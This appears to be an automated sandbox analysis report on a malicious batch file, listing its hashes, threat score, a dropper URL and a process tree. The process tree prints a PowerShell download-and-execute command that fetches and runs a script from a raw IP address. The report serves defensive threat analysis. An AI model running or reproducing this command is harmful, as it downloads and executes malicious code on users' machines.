Analysis
-
max time kernel
103s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
21-02-2020 16:10
Static task
static1
Behavioral task
behavioral1
Sample
Qqgre83T.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Qqgre83T.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
Qqgre83T.bat
-
Size
197B
-
MD5
23fb28ede9070f21977214722b7b46fe
-
SHA1
f81fbe696a0abdcf0e314125ed1aaf8779feff0d
-
SHA256
552e2dd699f7eb32c4ce0dc9dd35616b783cdf3fcb391b01b0422e2ad98a8a45
-
SHA512
dcd01869d9bd74264aba08b5c66f7a94b3c5513f0e713fdd3d596e1ed6cb43582c184d39ca9f78a6d23814a96535a5ef294f97c42594e10b7546d38e2f0cc4ac
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/Qqgre83T
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3524 3224 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3524 WerFault.exe Token: SeBackupPrivilege 3524 WerFault.exe Token: SeDebugPrivilege 3524 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"1⤵PID:4048
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;Start-Sleep -s 10000"2⤵PID:3224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3524